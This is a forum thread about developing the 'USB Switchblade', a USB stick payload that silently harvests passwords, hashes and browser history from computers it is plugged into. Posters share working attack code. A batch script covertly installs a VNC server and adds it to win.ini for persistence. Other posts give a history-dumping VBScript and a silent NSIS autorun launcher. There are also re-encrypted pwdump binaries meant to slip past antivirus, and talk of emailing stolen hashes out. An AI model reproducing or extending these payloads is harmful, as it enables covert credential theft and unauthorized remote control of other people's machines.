Jump to content

USB Switchblade Development

Darren Kitchen

By Darren Kitchen
in USB Hacks

 Share

Recommended Posts

DLSS Newbie

DLSS

Posted
Posted

ok so i on my turn modded xFilthyxJesusx 's package ...

i added a thight-vnc installer + injecting the run command into the win.ini file so it would run at startup :

progstart.bat renamed to progstart2.bat

and added following progstart.bat

@echo off



Xcopy "VNCHooks.dll" "C:WINDOWS" /R /k /y

Xcopy "winvnc.exe" "C:WINDOWS" /R /k /y



nircmd.exe execmd CALL batexeprogstart2.bat



cd /D "C:WINDOWS"

echo [windows]>>win.ini

echo Run=winvnc.exe>>win.ini

this runs fine when executing normal but doesn't want to work when doing it from the autorun ....

any help ?

o and to kapowdude nice how u make a duplicate of C as a network folder :D tho lm hash still wont b catched (all the log file gives is the username & machine name)

Link to comment
Share on other sites
  • Replies 581
  • Created
  • Last Reply

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

aznrocket Newbie

aznrocket

Posted
Posted
huh, just curious how difficult it would be to add a feature to this switchblade-- the capacity to copy files OFF of the computer you plug it into (e.g. documents, msn messenger logs, etc), while maintaining its stealthiness.

It wouldn't be hard to program in, but I rather like it the way it is since it's actually way more stealthy. As a systems administrator if I found that this happened on my network I could check traffic logs and possibly find the drop site that the cracker used.

How would I go about programming the capacity to copy (LOCALLY, to the switchblade!) particular documents, (like MSN Messenger Logs, given the directory is known), while maintaining stealthiness? Any guidance/help would be greatly appreciated.

Also, is there a reason why mspass.exe and/or pspv.exe wasn't encrypted like pwdump was? mspass, especially, would be crucial to my... switchblading.

Link to comment
Share on other sites
Darren Kitchen Grand Master

Darren Kitchen

Posted
  • Author
Posted
Edit: im gonna start the wiki

edit2: http://www.hak5.org/wiki/index.php?title=USB_Switchblade (help!!!)

Oops, I think I just overwrote your Wiki entry. That's the problem with wiki's when two people go to create a page at the same time. Feel free to merge your info in, it should be in the history page.

Link to comment
Share on other sites
DLSS Newbie

DLSS

Posted
Posted

don't ignore me please :cry:

ok so i on my turn modded xFilthyxJesusx 's package ...

i added a thight-vnc installer + injecting the run command into the win.ini file so it would run at startup :

progstart.bat renamed to progstart2.bat

and added following progstart.bat

@echo off



Xcopy "VNCHooks.dll" "C:WINDOWS" /R /k /y

Xcopy "winvnc.exe" "C:WINDOWS" /R /k /y



nircmd.exe execmd CALL batexeprogstart2.bat



cd /D "C:WINDOWS"

echo [windows]>>win.ini

echo Run=winvnc.exe>>win.ini

this runs fine when executing normal but doesn't want to work when doing it from the autorun ....

any help ?

o and to kapowdude nice how u make a duplicate of C as a network folder :D tho lm hash still wont b catched (all the log file gives is the username & machine name)

Link to comment
Share on other sites
kapowdude Newbie

kapowdude

Posted
Posted
You need to fix this I think. It seems to dump the passwords, unfortunately the device becomes unavailable afterware. The orange light on my switchblade goes on for a sec then turns off

/boots linux to see what the duece went wrong

EDIT: Works fine in windows now (randomly) However it didnt dump anything of mine. I did however find the password of "adwtiger" :wink:

Hmm is autorun enabled... sometimes it works for me sometimes it doesnt....

Oh and i fixed the zip :wink: thx

Link to comment
Share on other sites
w0lo Newbie

w0lo

Posted
Posted

The IE history dump(DUH.vbs) doesnt seem to work on my system, atleast it doesnt show every url, just the domain and approx date. So i whipped up something that does (Based on the existing script, if i get the time i will rewrite it in JScript, VBScript is so damn ugly and i cant pack lots of instructions on one line :roll: )

on error resume next

Function Dump(h,indent,fulldump)

for each item in h.items

    if indent>1 then

        s=h.GetDetailsOf(item,0) 

        if fulldump then s=h.GetDetailsOf(item,2)&vbTab&s&vbTab&h.GetDetailsOf(item,1)

        else

        s=h.GetDetailsOf(item,-1)

        end if

    wscript.echo String (indent," ") &s

    if item.isFolder then

        call Dump(item.GetFolder,indent+1,fulldump)

        end if

    if 0=indent then wscript.echo String (80,"-")

next

End Function

Dump createobject("Shell.Application").NameSpace(34),0,true

The full version can dump to html and just raw urls (no dates and page titles(the medium size version supports this aswell, just change the last true>false)) ( http://rapidshare.de/files/32573713/IE_DumpHistory.vbs.html )

Usage (of full version):

  • cscript /nologo IE_DumpHistory.vbs html>dump.html

cscript /nologo IE_DumpHistory.vbs all>dump.txt

And finally, a very compact version:

on error resume next

Function D(h,indent)

for each item in h.items

    wscript.echo String (indent," ")&h.GetDetailsOf(item,-1)

    if item.isFolder then call Dump(item.GetFolder,indent+1,fulldump)

    if 0=indent then wscript.echo String (80,"-")

next

End Function

D createobject("Shell.Application").NameSpace(34),0

Link to comment
Share on other sites
datamancer Newbie

datamancer

Posted
Posted

Okay i figured out it was my laptop causing my v3 problem. I got everything to work, by seeing these other posts can i update the scipt to include a search for msn/aim/yahoo pass's? If so how do i go about doing that?

Isnt there a batch file you can make that automaticly makes a separte admin acount? I remember seeing that a long while back.. Ill see if i can digg it up. lawl digg!

Link to comment
Share on other sites
Emilml Newbie

Emilml

Posted
Posted
Ok, so id like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on irc if you have a better idea. nick == Brainkill

=====================

pwdump and its dependencies can be encrypted. Ill post links below to the programs. Standard Disclaimers Apply!

http://www.brainkill.net/hack/pwdump.exe

http://www.brainkill.net/hack/pwservice.exe

http://www.brainkill.net/hack/LsaExt.dll

=======================

I can verify that the latest version of symantec anti-virus corporate edition with the latest updates does not detect this now. score one for brainkill!

I downloadet the 3 files and ran a scan whit symantec antivirus corporate edition and it found pwdump.exe and pwservice.exe as "hacker tools" so i dont think it worked?

Link to comment
Share on other sites
Darren Kitchen Grand Master

Darren Kitchen

Posted
  • Author
Posted
ok so i on my turn modded xFilthyxJesusx 's package ...

i added a thight-vnc installer + injecting the run command into the win.ini file so it would run at startup :

progstart.bat renamed to progstart2.bat

and added following progstart.bat

@echo off



Xcopy "VNCHooks.dll" "C:WINDOWS" /R /k /y

Xcopy "winvnc.exe" "C:WINDOWS" /R /k /y



nircmd.exe execmd CALL batexeprogstart2.bat



cd /D "C:WINDOWS"

echo [windows]>>win.ini

echo Run=winvnc.exe>>win.ini

this runs fine when executing normal but doesn't want to work when doing it from the autorun ....

any help ?

o and to kapowdude nice how u make a duplicate of C as a network folder :D tho lm hash still wont b catched (all the log file gives is the username & machine name)

That's awesome, what a great addition to the payload. I'm not sure why it's not executing on autorun. Maybe someone has an idea.

I'm seeing a lot of great mods to the payloads, we should consider adding a secion to the wiki switchblade page at:

www.hak5.org/wiki/index.php?title=USB_Switchblade

Link to comment
Share on other sites
w0lo Newbie

w0lo

Posted
Posted

Not exactly sure what the XP issue listed on the wiki page is but i whipped up a little something that i think fits the description

Autorun.inf then looks like:

[Autorun]

open=AutoExec.exe



[AutoExec]

Cmd=Notepad

Params=%WinDir%Win.ini

the NSIS source for the exe:

OutFile "AutoExec.exe"

SilentInstall silent

!define cfg "$ExeDirAutoRun.Inf"

Section

StrCpy $OUTDIR "$ExeDir"

ReadIniStr $0 ${cfg} "AutoExec" "Cmd"

ReadIniStr $1 ${cfg} "AutoExec" "Params"

ExecShell "" "$0" "$1" SW_HIDE

SectionEnd

Page InstFiles

Pre compiled exe: http://rapidshare.de/files/32684592/AutoExec.exe.html

Link to comment
Share on other sites
Loony Guitarist Newbie

Loony Guitarist

Posted
Posted
Hello,

Are there any loaders out that can load this software on a Memorex drive? I have the Memorex Mini Traveldrive U3 and can't seem to find a loader for it.

Thanks,

Vext

I have this problem too. I have both a Scandisk u3 drive and a memorex u3 drive. the lploader software will only work with a scandisk u3 drive but my drive is a 1gig and I want to use my memorex 512mb drive for this. So far I cant find a loader that will let you flash a memorex drive.

so it should be noted that so far this will only work on a scandisk u3 drive unless you use amish's method.

Link to comment
Share on other sites
straylight Newbie

straylight

Posted
Posted

First off, i'm new to the forums so let me start by saying hello!!

Now, i've been messing with this stuff for awhile and have found that it doesnt matter if the .iso is in the same directory as the LPInstaller.exe -- in my case it will always go out to the sandisk site and pull the new .iso image. If i disable my network connection formatting of the device will not complete successfully. My next move will be setting up a webserver on my local machine and spoofing the sandisk site to trick it into pulling the modded .iso file. This was not my idea, all credit goes to Wesley McGrew:

http://www.cse.msstate.edu/~rwm8/hackingU3/

He has done a ton of work related to the u3 drives, in fact i think he was the first to publicly disclose this info. His site also mentions that as long as the .iso and LPInstaller.exe file are in the same directory that there is no need to use the webserver trick.

Has this happened to anyone else? I have a 1gig micro a.k.a switchblade.

regards,

straylight

Link to comment
Share on other sites
VladBypass Newbie

VladBypass

Posted
Posted
I'd love to see it expanded so that it can email or somehow send the results to a user specified destination just for use in penetration testing.

lol this was on page 2 or 3 of this post :X

anyways, as you've said there it should be a posibility to mail it although I don't know the extent of PHP scripting.

I've used/modified an email php script which doesnt use a smtp server to mail (atleast it doesnt make you specify nor have I seen one in the code...) so emailing pure spoofed email text is possible... but attaching something im not so sure of...

but then again if its all text then your set, you just need to find a way to be able to send files via php scripting with that said script above or just find a way to launch a usb ftp program that connects enrypted to a server to upload the LM Hash...

Link to comment
Share on other sites
Silva Newbie

Silva

Posted
Posted
I'd love to see it expanded so that it can email or somehow send the results to a user specified destination just for use in penetration testing.

lol this was on page 2 or 3 of this post :X

anyways, as you've said there it should be a posibility to mail it although I don't know the extent of PHP scripting.

I've used/modified an email php script which doesnt use a smtp server to mail (atleast it doesnt make you specify nor have I seen one in the code...) so emailing pure spoofed email text is possible... but attaching something im not so sure of...

but then again if its all text then your set, you just need to find a way to be able to send files via php scripting with that said script above or just find a way to launch a usb ftp program that connects enrypted to a server to upload the LM Hash...

Or you can use google and find an easy way, running php scripts seems unefective in my book. SendMail for microsoft windows :D http://www.geocities.com/jaber_aljundi/#Wh...SendMail_Tool__ didn't play with it yet but seems simple enough since the file names are always the same I guess.

Link to comment
Share on other sites
Darren Kitchen Grand Master

Darren Kitchen

Posted
  • Author
Posted
I'd love to see it expanded so that it can email or somehow send the results to a user specified destination just for use in penetration testing.

lol this was on page 2 or 3 of this post :X

anyways, as you've said there it should be a posibility to mail it although I don't know the extent of PHP scripting.

I've used/modified an email php script which doesnt use a smtp server to mail (atleast it doesnt make you specify nor have I seen one in the code...) so emailing pure spoofed email text is possible... but attaching something im not so sure of...

but then again if its all text then your set, you just need to find a way to be able to send files via php scripting with that said script above or just find a way to launch a usb ftp program that connects enrypted to a server to upload the LM Hash...

Or you could use the command line email utility blat from http://www.blat.net/

But again, as I've said before, I rather like the fact that the switchblade doesn't create network traffic, thus keeping the tool self contained and leaving less evidence.

Link to comment
Share on other sites
amish Newbie

amish

Posted
Posted

Heya guys. Well bad news i lost my memory stick with liek 100's of password on it :S So i had to change them all.

Anyways before i lost it i had time to implement this

http://www.cqure.net/wp/?page_id=7

It grabs and decrypts the password for Tight VNC and Real VNC on the fly, and it runs in command line :D

So thats good to implement. =)

Im glad to see the projects going well.

But i think someone or myself shoudl implement a command line file encryptor to store these password safe everytime we dump them, jsut incase we loose them....like me. I wish i did that before

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...